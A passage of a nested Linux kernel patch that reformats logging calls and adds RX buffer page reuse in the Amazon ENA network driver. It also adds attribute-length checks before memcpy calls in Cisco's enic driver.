+ 
+ 	if (rc) {
+ 		if (rc == -EOPNOTSUPP) {
+-			netdev_dbg(ena_dev->net_device,
+-				   "Feature %d isn't supported\n",
++			netdev_dbg(ena_dev->net_device, "Feature %d isn't supported\n",
+ 				   ENA_ADMIN_INTERRUPT_MODERATION);
+ 			rc = 0;
+ 		} else {
+ 			netdev_err(ena_dev->net_device,
+-				   "Failed to get interrupt moderation admin cmd. rc: %d\n",
+-				   rc);
++				   "Failed to get interrupt moderation admin cmd. rc: %d\n", rc);
+ 		}
+ 
+ 		/* no moderation supported, disable adaptive support */
+@@ -2990,8 +2889,7 @@ int ena_com_config_dev_mode(struct ena_com_dev *ena_dev,
+ 		(llq_info->descs_num_before_header * sizeof(struct ena_eth_io_tx_desc));
+ 
+ 	if (unlikely(ena_dev->tx_max_header_size == 0)) {
+-		netdev_err(ena_dev->net_device,
+-			   "The size of the LLQ entry is smaller than needed\n");
++		netdev_err(ena_dev->net_device, "The size of the LLQ entry is smaller than needed\n");
+ 		return -EINVAL;
+ 	}
+ 
+diff --git a/drivers/net/ethernet/amazon/ena/ena_eth_com.c b/drivers/net/ethernet/amazon/ena/ena_eth_com.c
+index f9f886289b970..933e619b3a313 100644
+--- a/drivers/net/ethernet/amazon/ena/ena_eth_com.c
++++ b/drivers/net/ethernet/amazon/ena/ena_eth_com.c
+@@ -18,8 +18,7 @@ static struct ena_eth_io_rx_cdesc_base *ena_com_get_next_rx_cdesc(
+ 	cdesc = (struct ena_eth_io_rx_cdesc_base *)(io_cq->cdesc_addr.virt_addr
+ 			+ (head_masked * io_cq->cdesc_entry_size_in_bytes));
+ 
+-	desc_phase = (READ_ONCE(cdesc->status) &
+-		      ENA_ETH_IO_RX_CDESC_BASE_PHASE_MASK) >>
++	desc_phase = (READ_ONCE(cdesc->status) & ENA_ETH_IO_RX_CDESC_BASE_PHASE_MASK) >>
+ 		     ENA_ETH_IO_RX_CDESC_BASE_PHASE_SHIFT;
+ 
+ 	if (desc_phase != expected_phase)
+@@ -65,8 +64,8 @@ static int ena_com_write_bounce_buffer_to_dev(struct ena_com_io_sq *io_sq,
+ 
+ 		io_sq->entries_in_tx_burst_left--;
+ 		netdev_dbg(ena_com_io_sq_to_ena_dev(io_sq)->net_device,
+-			   "Decreasing entries_in_tx_burst_left of queue %d to %d\n",
+-			   io_sq->qid, io_sq->entries_in_tx_burst_left);
++			   "Decreasing entries_in_tx_burst_left of queue %d to %d\n", io_sq->qid,
++			   io_sq->entries_in_tx_burst_left);
+ 	}
+ 
+ 	/* Make sure everything was written into the bounce buffer before
+@@ -75,8 +74,8 @@ static int ena_com_write_bounce_buffer_to_dev(struct ena_com_io_sq *io_sq,
+ 	wmb();
+ 
+ 	/* The line is completed. Copy it to dev */
+-	__iowrite64_copy(io_sq->desc_addr.pbuf_dev_addr + dst_offset,
+-			 bounce_buffer, (llq_info->desc_list_entry_size) / 8);
++	__iowrite64_copy(io_sq->desc_addr.pbuf_dev_addr + dst_offset, bounce_buffer,
++			 (llq_info->desc_list_entry_size) / 8);
+ 
+ 	io_sq->tail++;
+ 
+@@ -102,16 +101,14 @@ static int ena_com_write_header_to_bounce(struct ena_com_io_sq *io_sq,
+ 	header_offset =
+ 		llq_info->descs_num_before_header * io_sq->desc_entry_size;
+ 
+-	if (unlikely((header_offset + header_len) >
+-		     llq_info->desc_list_entry_size)) {
++	if (unlikely((header_offset + header_len) > llq_info->desc_list_entry_size)) {
+ 		netdev_err(ena_com_io_sq_to_ena_dev(io_sq)->net_device,
+ 			   "Trying to write header larger than llq entry can accommodate\n");
+ 		return -EFAULT;
+ 	}
+ 
+ 	if (unlikely(!bounce_buffer)) {
+-		netdev_err(ena_com_io_sq_to_ena_dev(io_sq)->net_device,
+-			   "Bounce buffer is NULL\n");
++		netdev_err(ena_com_io_sq_to_ena_dev(io_sq)->net_device, "Bounce buffer is NULL\n");
+ 		return -EFAULT;
+ 	}
+ 
+@@ -129,8 +126,7 @@ static void *get_sq_desc_llq(struct ena_com_io_sq *io_sq)
+ 	bounce_buffer = pkt_ctrl->curr_bounce_buf;
+ 
+ 	if (unlikely(!bounce_buffer)) {
+-		netdev_err(ena_com_io_sq_to_ena_dev(io_sq)->net_device,
+-			   "Bounce buffer is NULL\n");
++		netdev_err(ena_com_io_sq_to_ena_dev(io_sq)->net_device, "Bounce buffer is NULL\n");
+ 		return NULL;
+ 	}
+ 
+@@ -247,8 +243,7 @@ static u16 ena_com_cdesc_rx_pkt_get(struct ena_com_io_cq *io_cq,
+ 
+ 		ena_com_cq_inc_head(io_cq);
+ 		count++;
+-		last = (READ_ONCE(cdesc->status) &
+-			ENA_ETH_IO_RX_CDESC_BASE_LAST_MASK) >>
++		last = (READ_ONCE(cdesc->status) & ENA_ETH_IO_RX_CDESC_BASE_LAST_MASK) >>
+ 		       ENA_ETH_IO_RX_CDESC_BASE_LAST_SHIFT;
+ 	} while (!last);
+ 
+@@ -369,9 +364,8 @@ static void ena_com_rx_set_flags(struct ena_com_io_cq *io_cq,
+ 
+ 	netdev_dbg(ena_com_io_cq_to_ena_dev(io_cq)->net_device,
+ 		   "l3_proto %d l4_proto %d l3_csum_err %d l4_csum_err %d hash %d frag %d cdesc_status %x\n",
+-		   ena_rx_ctx->l3_proto, ena_rx_ctx->l4_proto,
+-		   ena_rx_ctx->l3_csum_err, ena_rx_ctx->l4_csum_err,
+-		   ena_rx_ctx->hash, ena_rx_ctx->frag, cdesc->status);
++		   ena_rx_ctx->l3_proto, ena_rx_ctx->l4_proto, ena_rx_ctx->l3_csum_err,
++		   ena_rx_ctx->l4_csum_err, ena_rx_ctx->hash, ena_rx_ctx->frag, cdesc->status);
+ }
+ 
+ /*****************************************************************************/
+@@ -403,13 +397,12 @@ int ena_com_prepare_tx(struct ena_com_io_sq *io_sq,
+ 
+ 	if (unlikely(header_len > io_sq->tx_max_header_size)) {
+ 		netdev_err(ena_com_io_sq_to_ena_dev(io_sq)->net_device,
+-			   "Header size is too large %d max header: %d\n",
+-			   header_len, io_sq->tx_max_header_size);
++			   "Header size is too large %d max header: %d\n", header_len,
++			   io_sq->tx_max_header_size);
+ 		return -EINVAL;
+ 	}
+ 
+-	if (unlikely(io_sq->mem_queue_type == ENA_ADMIN_PLACEMENT_POLICY_DEV &&
+-		     !buffer_to_push)) {
++	if (unlikely(io_sq->mem_queue_type == ENA_ADMIN_PLACEMENT_POLICY_DEV && !buffer_to_push)) {
+ 		netdev_err(ena_com_io_sq_to_ena_dev(io_sq)->net_device,
+ 			   "Push header wasn't provided in LLQ mode\n");
+ 		return -EINVAL;
+@@ -556,13 +549,11 @@ int ena_com_rx_pkt(struct ena_com_io_cq *io_cq,
+ 	}
+ 
+ 	netdev_dbg(ena_com_io_cq_to_ena_dev(io_cq)->net_device,
+-		   "Fetch rx packet: queue %d completed desc: %d\n", io_cq->qid,
+-		   nb_hw_desc);
++		   "Fetch rx packet: queue %d completed desc: %d\n", io_cq->qid, nb_hw_desc);
+ 
+ 	if (unlikely(nb_hw_desc > ena_rx_ctx->max_bufs)) {
+ 		netdev_err(ena_com_io_cq_to_ena_dev(io_cq)->net_device,
+-			   "Too many RX cdescs (%d) > MAX(%d)\n", nb_hw_desc,
+-			   ena_rx_ctx->max_bufs);
++			   "Too many RX cdescs (%d) > MAX(%d)\n", nb_hw_desc, ena_rx_ctx->max_bufs);
+ 		return -ENOSPC;
+ 	}
+ 
+@@ -586,8 +577,8 @@ int ena_com_rx_pkt(struct ena_com_io_cq *io_cq,
+ 	io_sq->next_to_comp += nb_hw_desc;
+ 
+ 	netdev_dbg(ena_com_io_cq_to_ena_dev(io_cq)->net_device,
+-		   "[%s][QID#%d] Updating SQ head to: %d\n", __func__,
+-		   io_sq->qid, io_sq->next_to_comp);
++		   "[%s][QID#%d] Updating SQ head to: %d\n", __func__, io_sq->qid,
++		   io_sq->next_to_comp);
+ 
+ 	/* Get rx flags from the last pkt */
+ 	ena_com_rx_set_flags(io_cq, ena_rx_ctx, cdesc);
+@@ -624,8 +615,8 @@ int ena_com_add_single_rx_desc(struct ena_com_io_sq *io_sq,
+ 	desc->req_id = req_id;
+ 
+ 	netdev_dbg(ena_com_io_sq_to_ena_dev(io_sq)->net_device,
+-		   "[%s] Adding single RX desc, Queue: %u, req_id: %u\n",
+-		   __func__, io_sq->qid, req_id);
++		   "[%s] Adding single RX desc, Queue: %u, req_id: %u\n", __func__, io_sq->qid,
++		   req_id);
+ 
+ 	desc->buff_addr_lo = (u32)ena_buf->paddr;
+ 	desc->buff_addr_hi =
+diff --git a/drivers/net/ethernet/amazon/ena/ena_eth_com.h b/drivers/net/ethernet/amazon/ena/ena_eth_com.h
+index 689313ee25a80..07029eee78caf 100644
+--- a/drivers/net/ethernet/amazon/ena/ena_eth_com.h
++++ b/drivers/net/ethernet/amazon/ena/ena_eth_com.h
+@@ -141,8 +141,8 @@ static inline bool ena_com_is_doorbell_needed(struct ena_com_io_sq *io_sq,
+ 	}
+ 
+ 	netdev_dbg(ena_com_io_sq_to_ena_dev(io_sq)->net_device,
+-		   "Queue: %d num_descs: %d num_entries_needed: %d\n",
+-		   io_sq->qid, num_descs, num_entries_needed);
++		   "Queue: %d num_descs: %d num_entries_needed: %d\n", io_sq->qid, num_descs,
++		   num_entries_needed);
+ 
+ 	return num_entries_needed > io_sq->entries_in_tx_burst_left;
+ }
+@@ -153,15 +153,14 @@ static inline int ena_com_write_sq_doorbell(struct ena_com_io_sq *io_sq)
+ 	u16 tail = io_sq->tail;
+ 
+ 	netdev_dbg(ena_com_io_sq_to_ena_dev(io_sq)->net_device,
+-		   "Write submission queue doorbell for queue: %d tail: %d\n",
+-		   io_sq->qid, tail);
++		   "Write submission queue doorbell for queue: %d tail: %d\n", io_sq->qid, tail);
+ 
+ 	writel(tail, io_sq->db_addr);
+ 
+ 	if (is_llq_max_tx_burst_exists(io_sq)) {
+ 		netdev_dbg(ena_com_io_sq_to_ena_dev(io_sq)->net_device,
+-			   "Reset available entries in tx burst for queue %d to %d\n",
+-			   io_sq->qid, max_entries_in_tx_burst);
++			   "Reset available entries in tx burst for queue %d to %d\n", io_sq->qid,
++			   max_entries_in_tx_burst);
+ 		io_sq->entries_in_tx_burst_left = max_entries_in_tx_burst;
+ 	}
+ 
+@@ -244,8 +243,8 @@ static inline int ena_com_tx_comp_req_id_get(struct ena_com_io_cq *io_cq,
+ 
+ 	*req_id = READ_ONCE(cdesc->req_id);
+ 	if (unlikely(*req_id >= io_cq->q_depth)) {
+-		netdev_err(ena_com_io_cq_to_ena_dev(io_cq)->net_device,
+-			   "Invalid req id %d\n", cdesc->req_id);
++		netdev_err(ena_com_io_cq_to_ena_dev(io_cq)->net_device, "Invalid req id %d\n",
++			   cdesc->req_id);
+ 		return -EINVAL;
+ 	}
+ 
+diff --git a/drivers/net/ethernet/amazon/ena/ena_netdev.c b/drivers/net/ethernet/amazon/ena/ena_netdev.c
+index 5e37b18ac3adf..77fa4c35f2331 100644
+--- a/drivers/net/ethernet/amazon/ena/ena_netdev.c
++++ b/drivers/net/ethernet/amazon/ena/ena_netdev.c
+@@ -164,11 +164,9 @@ static int ena_xmit_common(struct net_device *dev,
+ 	if (unlikely(rc)) {
+ 		netif_err(adapter, tx_queued, dev,
+ 			  "Failed to prepare tx bufs\n");
+-		ena_increase_stat(&ring->tx_stats.prepare_ctx_err, 1,
+-				  &ring->syncp);
++		ena_increase_stat(&ring->tx_stats.prepare_ctx_err, 1, &ring->syncp);
+ 		if (rc != -ENOMEM)
+-			ena_reset_device(adapter,
+-					 ENA_REGS_RESET_DRIVER_INVALID_STATE);
++			ena_reset_device(adapter, ENA_REGS_RESET_DRIVER_INVALID_STATE);
+ 		return rc;
+ 	}
+ 
+@@ -992,8 +990,7 @@ static struct page *ena_alloc_map_page(struct ena_ring *rx_ring,
+ 	 */
+ 	page = dev_alloc_page();
+ 	if (!page) {
+-		ena_increase_stat(&rx_ring->rx_stats.page_alloc_fail, 1,
+-				  &rx_ring->syncp);
++		ena_increase_stat(&rx_ring->rx_stats.page_alloc_fail, 1, &rx_ring->syncp);
+ 		return ERR_PTR(-ENOSPC);
+ 	}
+ 
+@@ -1022,7 +1019,7 @@ static int ena_alloc_rx_buffer(struct ena_ring *rx_ring,
+ 	int tailroom;
+ 
+ 	/* restore page offset value in case it has been changed by device */
+-	rx_info->page_offset = headroom;
++	rx_info->buf_offset = headroom;
+ 
+ 	/* if previous allocated page is not used */
+ 	if (unlikely(rx_info->page))
+@@ -1039,6 +1036,8 @@ static int ena_alloc_rx_buffer(struct ena_ring *rx_ring,
+ 	tailroom = SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
+ 
+ 	rx_info->page = page;
++	rx_info->dma_addr = dma;
++	rx_info->page_offset = 0;
+ 	ena_buf = &rx_info->ena_buf;
+ 	ena_buf->paddr = dma + headroom;
+ 	ena_buf->len = ENA_PAGE_SIZE - headroom - tailroom;
+@@ -1046,14 +1045,12 @@ static int ena_alloc_rx_buffer(struct ena_ring *rx_ring,
+ 	return 0;
+ }
+ 
+-static void ena_unmap_rx_buff(struct ena_ring *rx_ring,
+-			      struct ena_rx_buffer *rx_info)
++static void ena_unmap_rx_buff_attrs(struct ena_ring *rx_ring,
++				    struct ena_rx_buffer *rx_info,
++				    unsigned long attrs)
+ {
+-	struct ena_com_buf *ena_buf = &rx_info->ena_buf;
+-
+-	dma_unmap_page(rx_ring->dev, ena_buf->paddr - rx_ring->rx_headroom,
+-		       ENA_PAGE_SIZE,
+-		       DMA_BIDIRECTIONAL);
++	dma_unmap_page_attrs(rx_ring->dev, rx_info->dma_addr, ENA_PAGE_SIZE, DMA_BIDIRECTIONAL,
++			     attrs);
+ }
+ 
+ static void ena_free_rx_page(struct ena_ring *rx_ring,
+@@ -1067,7 +1064,7 @@ static void ena_free_rx_page(struct ena_ring *rx_ring,
+ 		return;
+ 	}
+ 
+-	ena_unmap_rx_buff(rx_ring, rx_info);
++	ena_unmap_rx_buff_attrs(rx_ring, rx_info, 0);
+ 
+ 	__free_page(page);
+ 	rx_info->page = NULL;
+@@ -1344,8 +1341,7 @@ static int ena_clean_tx_irq(struct ena_ring *tx_ring, u32 budget)
+ 						&req_id);
+ 		if (rc) {
+ 			if (unlikely(rc == -EINVAL))
+-				handle_invalid_req_id(tx_ring, req_id, NULL,
+-						      false);
++				handle_invalid_req_id(tx_ring, req_id, NULL, false);
+ 			break;
+ 		}
+ 
+@@ -1413,14 +1409,14 @@ static int ena_clean_tx_irq(struct ena_ring *tx_ring, u32 budget)
+ 	return tx_pkts;
+ }
+ 
+-static struct sk_buff *ena_alloc_skb(struct ena_ring *rx_ring, void *first_frag)
++static struct sk_buff *ena_alloc_skb(struct ena_ring *rx_ring, void *first_frag, u16 len)
+ {
+ 	struct sk_buff *skb;
+ 
+ 	if (!first_frag)
+-		skb = napi_alloc_skb(rx_ring->napi, rx_ring->rx_copybreak);
++		skb = napi_alloc_skb(rx_ring->napi, len);
+ 	else
+-		skb = napi_build_skb(first_frag, ENA_PAGE_SIZE);
++		skb = napi_build_skb(first_frag, len);
+ 
+ 	if (unlikely(!skb)) {
+ 		ena_increase_stat(&rx_ring->rx_stats.skb_alloc_fail, 1,
+@@ -1429,24 +1425,47 @@ static struct sk_buff *ena_alloc_skb(struct ena_ring *rx_ring, void *first_frag)
+ 		netif_dbg(rx_ring->adapter, rx_err, rx_ring->netdev,
+ 			  "Failed to allocate skb. first_frag %s\n",
+ 			  first_frag ? "provided" : "not provided");
+-		return NULL;
+ 	}
+ 
+ 	return skb;
+ }
+ 
++static bool ena_try_rx_buf_page_reuse(struct ena_rx_buffer *rx_info, u16 buf_len,
++				      u16 len, int pkt_offset)
++{
++	struct ena_com_buf *ena_buf = &rx_info->ena_buf;
++
++	/* More than ENA_MIN_RX_BUF_SIZE left in the reused buffer
++	 * for data + headroom + tailroom.
++	 */
++	if (SKB_DATA_ALIGN(len + pkt_offset) + ENA_MIN_RX_BUF_SIZE <= ena_buf->len) {
++		page_ref_inc(rx_info->page);
++		rx_info->page_offset += buf_len;
++		ena_buf->paddr += buf_len;
++		ena_buf->len -= buf_len;
++		return true;
++	}
++
++	return false;
++}
++
+ static struct sk_buff *ena_rx_skb(struct ena_ring *rx_ring,
+ 				  struct ena_com_rx_buf_info *ena_bufs,
+ 				  u32 descs,
+ 				  u16 *next_to_clean)
+ {
++	int tailroom = SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
++	bool is_xdp_loaded = ena_xdp_present_ring(rx_ring);
+ 	struct ena_rx_buffer *rx_info;
+ 	struct ena_adapter *adapter;
++	int page_offset, pkt_offset;
++	dma_addr_t pre_reuse_paddr;
+ 	u16 len, req_id, buf = 0;
++	bool reuse_rx_buf_page;
+ 	struct sk_buff *skb;
+-	void *page_addr;
+-	u32 page_offset;
+-	void *data_addr;
++	void *buf_addr;
++	int buf_offset;
++	u16 buf_len;
+ 
+ 	len = ena_bufs[buf].len;
+ 	req_id = ena_bufs[buf].req_id;
+@@ -1466,34 +1485,25 @@ static struct sk_buff *ena_rx_skb(struct ena_ring *rx_ring,
+ 		  "rx_info %p page %p\n",
+ 		  rx_info, rx_info->page);
+ 
+-	/* save virt address of first buffer */
+-	page_addr = page_address(rx_info->page);
++	buf_offset = rx_info->buf_offset;
++	pkt_offset = buf_offset - rx_ring->rx_headroom;
+ 	page_offset = rx_info->page_offset;
+-	data_addr = page_addr + page_offset;
+-
+-	prefetch(data_addr);
++	buf_addr = page_address(rx_info->page) + page_offset;
+ 
+ 	if (len <= rx_ring->rx_copybreak) {
+-		skb = ena_alloc_skb(rx_ring, NULL);
++		skb = ena_alloc_skb(rx_ring, NULL, len);
+ 		if (unlikely(!skb))
+ 			return NULL;
+ 
+-		netif_dbg(rx_ring->adapter, rx_status, rx_ring->netdev,
+-			  "RX allocated small packet. len %d. data_len %d\n",
+-			  skb->len, skb->data_len);
+-
+-		/* sync this buffer for CPU use */
+-		dma_sync_single_for_cpu(rx_ring->dev,
+-					dma_unmap_addr(&rx_info->ena_buf, paddr),
+-					len,
+-					DMA_FROM_DEVICE);
+-		skb_copy_to_linear_data(skb, data_addr, len);
++		skb_copy_to_linear_data(skb, buf_addr + buf_offset, len);
+ 		dma_sync_single_for_device(rx_ring->dev,
+-					   dma_unmap_addr(&rx_info->ena_buf, paddr),
++					   dma_unmap_addr(&rx_info->ena_buf, paddr) + pkt_offset,
+ 					   len,
+ 					   DMA_FROM_DEVICE);
+ 
+ 		skb_put(skb, len);
++		netif_dbg(rx_ring->adapter, rx_status, rx_ring->netdev,
++			  "RX allocated small packet. len %d.\n", skb->len);
+ 		skb->protocol = eth_type_trans(skb, rx_ring->netdev);
+ 		rx_ring->free_ids[*next_to_clean] = req_id;
+ 		*next_to_clean = ENA_RX_RING_IDX_ADD(*next_to_clean, descs,
+@@ -1501,14 +1511,21 @@ static struct sk_buff *ena_rx_skb(struct ena_ring *rx_ring,
+ 		return skb;
+ 	}
+ 
+-	ena_unmap_rx_buff(rx_ring, rx_info);
++	buf_len = SKB_DATA_ALIGN(len + buf_offset + tailroom);
++
++	/* If XDP isn't loaded try to reuse part of the RX buffer */
++	reuse_rx_buf_page = !is_xdp_loaded &&
++			    ena_try_rx_buf_page_reuse(rx_info, buf_len, len, pkt_offset);
++
++	if (!reuse_rx_buf_page)
++		ena_unmap_rx_buff_attrs(rx_ring, rx_info, DMA_ATTR_SKIP_CPU_SYNC);
+ 
+-	skb = ena_alloc_skb(rx_ring, page_addr);
++	skb = ena_alloc_skb(rx_ring, buf_addr, buf_len);
+ 	if (unlikely(!skb))
+ 		return NULL;
+ 
+ 	/* Populate skb's linear part */
+-	skb_reserve(skb, page_offset);
++	skb_reserve(skb, buf_offset);
+ 	skb_put(skb, len);
+ 	skb->protocol = eth_type_trans(skb, rx_ring->netdev);
+ 
+@@ -1517,7 +1534,8 @@ static struct sk_buff *ena_rx_skb(struct ena_ring *rx_ring,
+ 			  "RX skb updated. len %d. data_len %d\n",
+ 			  skb->len, skb->data_len);
+ 
+-		rx_info->page = NULL;
++		if (!reuse_rx_buf_page)
++			rx_info->page = NULL;
+ 
+ 		rx_ring->free_ids[*next_to_clean] = req_id;
+ 		*next_to_clean =
+@@ -1532,10 +1550,27 @@ static struct sk_buff *ena_rx_skb(struct ena_ring *rx_ring,
+ 
+ 		rx_info = &rx_ring->rx_buffer_info[req_id];
+ 
+-		ena_unmap_rx_buff(rx_ring, rx_info);
++		/* rx_info->buf_offset includes rx_ring->rx_headroom */
++		buf_offset = rx_info->buf_offset;
++		pkt_offset = buf_offset - rx_ring->rx_headroom;
++		buf_len = SKB_DATA_ALIGN(len + buf_offset + tailroom);
++		page_offset = rx_info->page_offset;
++
++		pre_reuse_paddr = dma_unmap_addr(&rx_info->ena_buf, paddr);
++
++		reuse_rx_buf_page = !is_xdp_loaded &&
++				    ena_try_rx_buf_page_reuse(rx_info, buf_len, len, pkt_offset);
++
++		dma_sync_single_for_cpu(rx_ring->dev,
++					pre_reuse_paddr + pkt_offset,
++					len,
++					DMA_FROM_DEVICE);
++
++		if (!reuse_rx_buf_page)
++			ena_unmap_rx_buff_attrs(rx_ring, rx_info, DMA_ATTR_SKIP_CPU_SYNC);
+ 
+ 		skb_add_rx_frag(skb, skb_shinfo(skb)->nr_frags, rx_info->page,
+-				rx_info->page_offset, len, ENA_PAGE_SIZE);
++				page_offset + buf_offset, len, buf_len);
+ 
+ 	} while (1);
+ 
+@@ -1641,14 +1676,14 @@ static int ena_xdp_handle_buff(struct ena_ring *rx_ring, struct xdp_buff *xdp, u
+ 
+ 	rx_info = &rx_ring->rx_buffer_info[rx_ring->ena_bufs[0].req_id];
+ 	xdp_prepare_buff(xdp, page_address(rx_info->page),
+-			 rx_info->page_offset,
++			 rx_info->buf_offset,
+ 			 rx_ring->ena_bufs[0].len, false);
+ 
+ 	ret = ena_xdp_execute(rx_ring, xdp);
+ 
+ 	/* The xdp program might expand the headers */
+ 	if (ret == ENA_XDP_PASS) {
+-		rx_info->page_offset = xdp->data - xdp->data_hard_start;
++		rx_info->buf_offset = xdp->data - xdp->data_hard_start;
+ 		rx_ring->ena_bufs[0].len = xdp->data_end - xdp->data;
+ 	}
+ 
+@@ -1677,6 +1712,7 @@ static int ena_clean_rx_irq(struct ena_ring *rx_ring, struct napi_struct *napi,
+ 	int xdp_flags = 0;
+ 	int total_len = 0;
+ 	int xdp_verdict;
++	u8 pkt_offset;
+ 	int rc = 0;
+ 	int i;
+ 
+@@ -1703,13 +1739,19 @@ static int ena_clean_rx_irq(struct ena_ring *rx_ring, struct napi_struct *napi,
+ 
+ 		/* First descriptor might have an offset set by the device */
+ 		rx_info = &rx_ring->rx_buffer_info[rx_ring->ena_bufs[0].req_id];
+-		rx_info->page_offset += ena_rx_ctx.pkt_offset;
++		pkt_offset = ena_rx_ctx.pkt_offset;
++		rx_info->buf_offset += pkt_offset;
+ 
+ 		netif_dbg(rx_ring->adapter, rx_status, rx_ring->netdev,
+ 			  "rx_poll: q %d got packet from ena. descs #: %d l3 proto %d l4 proto %d hash: %x\n",
+ 			  rx_ring->qid, ena_rx_ctx.descs, ena_rx_ctx.l3_proto,
+ 			  ena_rx_ctx.l4_proto, ena_rx_ctx.hash);
+ 
++		dma_sync_single_for_cpu(rx_ring->dev,
++					dma_unmap_addr(&rx_info->ena_buf, paddr) + pkt_offset,
++					rx_ring->ena_bufs[0].len,
++					DMA_FROM_DEVICE);
++
+ 		if (ena_xdp_present_ring(rx_ring))
+ 			xdp_verdict = ena_xdp_handle_buff(rx_ring, &xdp, ena_rx_ctx.descs);
+ 
+@@ -1733,8 +1775,9 @@ static int ena_clean_rx_irq(struct ena_ring *rx_ring, struct napi_struct *napi,
+ 				 * from RX side.
+ 				 */
+ 				if (xdp_verdict & ENA_XDP_FORWARDED) {
+-					ena_unmap_rx_buff(rx_ring,
+-							  &rx_ring->rx_buffer_info[req_id]);
++					ena_unmap_rx_buff_attrs(rx_ring,
++								&rx_ring->rx_buffer_info[req_id],
++								DMA_ATTR_SKIP_CPU_SYNC);
+ 					rx_ring->rx_buffer_info[req_id].page = NULL;
+ 				}
+ 			}
+@@ -1796,8 +1839,7 @@ static int ena_clean_rx_irq(struct ena_ring *rx_ring, struct napi_struct *napi,
+ 	adapter = netdev_priv(rx_ring->netdev);
+ 
+ 	if (rc == -ENOSPC) {
+-		ena_increase_stat(&rx_ring->rx_stats.bad_desc_num, 1,
+-				  &rx_ring->syncp);
++		ena_increase_stat(&rx_ring->rx_stats.bad_desc_num, 1, &rx_ring->syncp);
+ 		ena_reset_device(adapter, ENA_REGS_RESET_TOO_MANY_RX_DESCS);
+ 	} else {
+ 		ena_increase_stat(&rx_ring->rx_stats.bad_req_id, 1,
+@@ -2342,8 +2384,7 @@ static int ena_rss_configure(struct ena_adapter *adapter)
+ 	if (!ena_dev->rss.tbl_log_size) {
+ 		rc = ena_rss_init_default(adapter);
+ 		if (rc && (rc != -EOPNOTSUPP)) {
+-			netif_err(adapter, ifup, adapter->netdev,
+-				  "Failed to init RSS rc: %d\n", rc);
++			netif_err(adapter, ifup, adapter->netdev, "Failed to init RSS rc: %d\n", rc);
+ 			return rc;
+ 		}
+ 	}
+@@ -3216,7 +3257,8 @@ static void ena_config_host_info(struct ena_com_dev *ena_dev, struct pci_dev *pd
+ 		ENA_ADMIN_HOST_INFO_RX_OFFSET_MASK |
+ 		ENA_ADMIN_HOST_INFO_INTERRUPT_MODERATION_MASK |
+ 		ENA_ADMIN_HOST_INFO_RX_BUF_MIRRORING_MASK |
+-		ENA_ADMIN_HOST_INFO_RSS_CONFIGURABLE_FUNCTION_KEY_MASK;
++		ENA_ADMIN_HOST_INFO_RSS_CONFIGURABLE_FUNCTION_KEY_MASK |
++		ENA_ADMIN_HOST_INFO_RX_PAGE_REUSE_MASK;
+ 
+ 	rc = ena_com_set_host_attributes(ena_dev);
+ 	if (rc) {
+@@ -3259,8 +3301,7 @@ static void ena_config_debug_area(struct ena_adapter *adapter)
+ 	rc = ena_com_set_host_attributes(adapter->ena_dev);
+ 	if (rc) {
+ 		if (rc == -EOPNOTSUPP)
+-			netif_warn(adapter, drv, adapter->netdev,
+-				   "Cannot set host attributes\n");
++			netif_warn(adapter, drv, adapter->netdev, "Cannot set host attributes\n");
+ 		else
+ 			netif_err(adapter, drv, adapter->netdev,
+ 				  "Cannot set host attributes\n");
+@@ -4132,8 +4173,8 @@ static int ena_rss_init_default(struct ena_adapter *adapter)
+ 		}
+ 	}
+ 
+-	rc = ena_com_fill_hash_function(ena_dev, ENA_ADMIN_TOEPLITZ, NULL,
+-					ENA_HASH_KEY_SIZE, 0xFFFFFFFF);
++	rc = ena_com_fill_hash_function(ena_dev, ENA_ADMIN_TOEPLITZ, NULL, ENA_HASH_KEY_SIZE,
++					0xFFFFFFFF);
+ 	if (unlikely(rc && (rc != -EOPNOTSUPP))) {
+ 		dev_err(dev, "Cannot fill hash function\n");
+ 		goto err_fill_indir;
+diff --git a/drivers/net/ethernet/amazon/ena/ena_netdev.h b/drivers/net/ethernet/amazon/ena/ena_netdev.h
+index 2cb141079474c..73bfd7229c6aa 100644
+--- a/drivers/net/ethernet/amazon/ena/ena_netdev.h
++++ b/drivers/net/ethernet/amazon/ena/ena_netdev.h
+@@ -51,6 +51,8 @@
+ #define ENA_DEFAULT_RING_SIZE	(1024)
+ #define ENA_MIN_RING_SIZE	(256)
+ 
++#define ENA_MIN_RX_BUF_SIZE (2048)
++
+ #define ENA_MIN_NUM_IO_QUEUES	(1)
+ 
+ #define ENA_TX_WAKEUP_THRESH		(MAX_SKB_FRAGS + 2)
+@@ -175,7 +177,9 @@ struct ena_tx_buffer {
+ struct ena_rx_buffer {
+ 	struct sk_buff *skb;
+ 	struct page *page;
++	dma_addr_t dma_addr;
+ 	u32 page_offset;
++	u32 buf_offset;
+ 	struct ena_com_buf ena_buf;
+ } ____cacheline_aligned;
+ 
+diff --git a/drivers/net/ethernet/cisco/enic/enic_main.c b/drivers/net/ethernet/cisco/enic/enic_main.c
+index 29500d32e3626..2065c26f394db 100644
+--- a/drivers/net/ethernet/cisco/enic/enic_main.c
++++ b/drivers/net/ethernet/cisco/enic/enic_main.c
+@@ -1117,18 +1117,30 @@ static int enic_set_vf_port(struct net_device *netdev, int vf,
+ 	pp->request = nla_get_u8(port[IFLA_PORT_REQUEST]);
+ 
+ 	if (port[IFLA_PORT_PROFILE]) {
++		if (nla_len(port[IFLA_PORT_PROFILE]) != PORT_PROFILE_MAX) {
++			memcpy(pp, &prev_pp, sizeof(*pp));
++			return -EINVAL;
++		}
+ 		pp->set |= ENIC_SET_NAME;
+ 		memcpy(pp->name, nla_data(port[IFLA_PORT_PROFILE]),
+ 			PORT_PROFILE_MAX);
+ 	}
+ 
+ 	if (port[IFLA_PORT_INSTANCE_UUID]) {
++		if (nla_len(port[IFLA_PORT_INSTANCE_UUID]) != PORT_UUID_MAX) {
++			memcpy(pp, &prev_pp, sizeof(*pp));
++			return -EINVAL;
++		}
+ 		pp->set |= ENIC_SET_INSTANCE;
+ 		memcpy(pp->instance_uuid,
+ 			nla_data(port[IFLA_PORT_INSTANCE_UUID]), PORT_UUID_MAX);
+ 	}
+ 
+ 	if (port[IFLA_PORT_HOST_UUID]) {
++		if (nla_len(port[IFLA_PORT_HOST_UUID]) != PORT_UUID_MAX) {
++			memcpy(pp, &prev_pp, sizeof(*pp));
++			return -EINVAL;
++		}
+ 		pp->set |= ENIC_SET_HOST;
+ 		memcpy(pp->host_uuid,
+ 			nla_data(port[IFLA_PORT_HOST_UUID]), PORT_UUID_MAX);
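
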